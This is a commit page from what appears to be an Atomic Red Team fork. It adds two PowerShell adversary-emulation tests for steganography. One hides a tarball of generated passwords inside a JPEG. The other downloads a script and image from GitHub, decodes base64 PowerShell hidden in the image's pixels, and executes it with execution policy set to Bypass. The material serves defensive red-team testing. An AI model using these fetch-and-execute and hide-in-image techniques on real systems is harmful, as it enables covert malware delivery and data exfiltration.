security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

New Tests: T1001.002 - Data Obfuscation: Steganography (#2695)

Browse Source 
* Create T1001.002.yaml

* Create T1001.002.md

* Update T1001.002.yaml

* Update T1001.002.yaml

* Delete atomics/T1001.002/T1001.002.md

---------

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
This commit is contained in:
Raghav_Singh
2024-03-07 03:42:19 +11:00
committed by GitHub
parent 029110b694
commit 097ed862cc
1 changed files with 148 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1001.002/T1001.002.yaml
+148
View File
@@ -0,0 +1,148 @@
attack_technique: T1001.002
display_name: "Data Obfuscation via Steganography"
atomic_tests:
- name: Steganographic Tarball Embedding
auto_generated_guid: c7921449-8b62-4c4d-8a83-d9281ac0190b
description: |
This atomic test, named "Steganographic Tarball Embedding", simulates the technique of data obfuscation via steganography by embedding a tar archive file (tarball)
within an image.
The test begins by ensuring the availability of the image file and the tarball file containing data . It then generates random passwords and saves them to a
file. Subsequently, the tarball file is created, containing the passwords file. The test executor command reads the contents of the image
file and the tarball file as byte arrays and appends them together to form a new image file. This process effectively embeds the tarball
file within the image, utilizing steganography techniques for data obfuscation.
This atomic test simulates the technique of data obfuscation via steganography, enabling attackers to clandestinely transfer files across systems undetected.
By embedding the tarball file within the image, adversaries can obscure their activities, facilitating covert communication and data exfiltration.
supported_platforms:
- windows
input_arguments:
image_file:
description: Image file which will be downloaded to be used to hide data
type: path
default: PathToAtomicsFolder\T1001.002\bin\T1001.002.jpg
tar_file:
description: Tarz file containing random passwords
type: path
default: $env:PUBLIC\Downloads\T1001.002.tarz
new_image_file:
description: new image file ready for extraction
type: path
default: $env:PUBLIC\Downloads\T1001.002New.jpg
passwords_file:
description: Text file containing random passwords
type: path
default: $env:TEMP\random_passwords.txt
dependency_executor_name: powershell
dependencies:
- description: |
Image file must exist
prereq_command: |
if (!(Test-Path "#{image_file}")) {exit 1} else {
{exit 0}
}
get_prereq_command: |
New-Item -Type Directory (split-path "#{image_file}") -ErrorAction ignore | Out-Null
Write-Output "Downloading image file..."
$imageUrl = "https://github.com/raghavsingh7/Pictures/raw/a9617d9fce289909441120a1e0366315c2c5e19d/lime.jpg"
Invoke-WebRequest -Uri $imageUrl -OutFile "#{image_file}"
- description: |
File to hide within tarz file must exist
prereq_command: |
if (!(Test-Path "#{passwords_file}")) {exit 1} else {
{exit 0}
}
get_prereq_command: |
Write-Output "Generating random passwords and saving to file..."
$passwords = 1..10 | ForEach-Object { Get-Random -InputObject ('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_=+[]{}|;:,.<>?') -Count 12 }
$passwords | Out-File -FilePath "#{passwords_file}"
- description: |
Tarz file to embed in image must exist
prereq_command: |
if (!(Test-Path "#{tar_file}")) {exit 1} else {
{exit 0}
}
get_prereq_command: |
Write-Output "Generating tarz file..."
tar -cvf "#{tar_file}" "#{passwords_file}"
executor:
name: powershell
elevation_required: true
command: |
Get-Content "#{image_file}", "#{tar_file}" -Encoding byte -ReadCount 0 | Set-Content "#{new_image_file}" -Encoding byte
cleanup_command: |
Set-ExecutionPolicy Bypass -Scope Process -Force -ErrorAction Ignore
Remove-Item -Path "#{new_image_file}" -Force -ErrorAction Ignore
- name: Embedded Script in Image Execution via Extract-Invoke-PSImage
auto_generated_guid: 04bb8e3d-1670-46ab-a3f1-5cee64da29b6
description: |
This atomic test demonstrates the technique of data obfuscation via steganography, where a PowerShell script is concealed within an image file.
The PowerShell script is embedded using steganography techniques, making it undetectable by traditional security measures. The script is hidden
within the pixels of the image, enabling attackers to covertly transfer and execute malicious code across systems.
The test begins by ensuring the availability of the malicious image file and the Extract-Invoke-PSImage script. The test proceeds to extract the hidden
PowerShell script (decoded.ps1) from the image file using the Extract-Invoke-PSImage tool. The extracted script is then decoded from base64 encoding and saved as a
separate PowerShell (textExtraction.ps1). Consequently, the textExtraction.ps1 script is executed.
In the case of this atomic test, the malicious image file which is downloaded has the powershell command Start-Process notepad embedded within in base64. This
is done to emulate an attackers behaviour in the case they were to execute malware embedded within the image file.
supported_platforms:
- windows
input_arguments:
image_file:
description: Malicious Image file which will be downloaded
type: path
default: PathToAtomicsFolder\T1001.002\bin\evil_kitten.jpg
psimage_script:
description: Extract-Invoke-PSImage Script downloaded
type: path
default: PathToAtomicsFolder\ExternalPayloads\Extract-Invoke-PSImage.ps1
dependency_executor_name: powershell
dependencies:
- description: |
Image file must exist
prereq_command: |
if (!(Test-Path "#{image_file}")) {exit 1} else {
{exit 0}
}
get_prereq_command: |
New-Item -Type Directory (split-path "#{image_file}") -ErrorAction Ignore | Out-Null
Write-Output "Downloading image file..."
$imageUrl = "https://github.com/raghavsingh7/Pictures/raw/f73e7686cdd848ed06e63af07f6f1a5e72de6320/evil_kitten.jpg"
Invoke-WebRequest -Uri $imageUrl -OutFile #{image_file}
- description: |
Extract-Invoke-PSImage must exist
prereq_command: |
if (!(Test-Path "#{psimage_script}")) {exit 1} else {
{exit 0}
}
get_prereq_command: |
New-Item -Path "PathToAtomicsFolder\ExternalPayloads\" -ItemType Directory -Force | Out-Null
Write-Output "Downloading Extract-Invoke-PSImage.ps1 script..."
$scriptUrl = "https://github.com/raghavsingh7/Extract-Invoke-PSImage/raw/7d8c165d2f9bfe9c3965181079b7c82e03168ce1/Extract-Invoke-PSImage.ps1"
Invoke-WebRequest -Uri $scriptUrl -OutFile #{psimage_script}
executor:
name: powershell
elevation_required: true
command: |
cd "PathToAtomicsFolder\ExternalPayloads\"
Import-Module .\Extract-Invoke-PSImage.ps1
$extractedScript=Extract-Invoke-PSImage -Image "#{image_file}" -Out "$HOME\result.ps1"
$scriptContent = Get-Content "$HOME\result.ps1" -Raw
$base64Pattern = "(?<=^|[^A-Za-z0-9+/])(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}(==)?|[A-Za-z0-9+/]{3}=)?(?=$|[^A-Za-z0-9+/])"
$base64Strings = [regex]::Matches($scriptContent, $base64Pattern) | ForEach-Object { $_.Value }
$base64Strings | Set-Content "$HOME\decoded.ps1"
$decodedContent = Get-Content "$HOME\decoded.ps1" -Raw
$decodedText = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($decodedContent))
$textPattern = '^.+'
$textMatches = [regex]::Matches($decodedText, $textPattern) | ForEach-Object { $_.Value }
$scriptPath = "$HOME\textExtraction.ps1"
$textMatches -join '' | Set-Content -Path $scriptPath
. "$HOME\textExtraction.ps1"
cleanup_command: |
Set-ExecutionPolicy Bypass -Scope Process -Force -ErrorAction Ignore
Remove-Item -Path "$HOME\result.ps1" -Force -ErrorAction Ignore
Remove-Item -Path "$HOME\textExtraction.ps1" -Force -ErrorAction Ignore
Remove-Item -Path "$HOME\decoded.ps1" -Force -ErrorAction Ignore